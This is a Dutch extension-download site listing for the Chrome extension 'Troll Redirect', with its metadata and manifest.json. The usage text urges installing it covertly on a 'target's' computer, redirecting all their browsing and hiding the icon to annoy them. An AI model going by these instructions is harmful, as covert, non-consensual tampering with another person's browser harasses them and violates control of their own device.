Troll Redirect
Redirect all of your friend's webpages automatically by installing this on their computer!
Wat is Troll Redirect?
Troll Redirect is een Chrome-extensie ontwikkeld door Aaron Lockhart, en de belangrijkste functie is "Redirect all of your friend's webpages automatically by installing this on their computer!".
Extensie Screenshots
Download het CRX-bestand van de extensie Troll Redirect
Download Troll Redirect-extensiebestanden in crx-indeling, installeer Chrome-extensies handmatig in de browser of deel de crx-bestanden met vrienden om Chrome-extensies eenvoudig te installeren.
Instructies voor het Gebruik van de Extensie
Troll and prank your friends with this automatically redirecting app! Upon installing it on your target's computer, click the icon and specify the website to which all requests will be redirected. This is guaranteed to frustrate and annoy your target immensely. Then hide the icon in the chrome menu and sit back while your target gets increasingly angry.
Basisinformatie over de Extensie
Naam | |
ID | micldaecbnddhhcaojamonojfdffegph |
Officiële URL | https://chrome.google.com/webstore/detail/troll-redirect/micldaecbnddhhcaojamonojfdffegph |
Beschrijving | Redirect all of your friend's webpages automatically by installing this on their computer! |
Bestandsgrootte | 949 KB |
Aantal Installaties | 192 |
Huidige Versie | 1.0 |
Laatst Bijgewerkt | 2018-12-06 |
Publicatiedatum | 2018-12-02 |
Beoordeling | 4.75/5 Totaal 4 Beoordelingen |
Ontwikkelaar | Aaron Lockhart |
[email protected] | |
Betalingswijze | free |
Ondersteunde Talen | en |
manifest.json | |
{ "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx", "name": "Troll Redirect", "version": "1.0", "description": "Redirect all of your friend's webpages automatically by installing this on their computer!", "manifest_version": 2, "author": "Aaron Lockhart", "permissions": [ "tabs", "storage" ], "content_scripts": [ { "matches": [ "*:\/\/*\/*" ], "js": [ "\/src\/troll.js" ], "run_at": "document_end" } ], "browser_action": { "default_popup": "\/src\/popup.html" } } |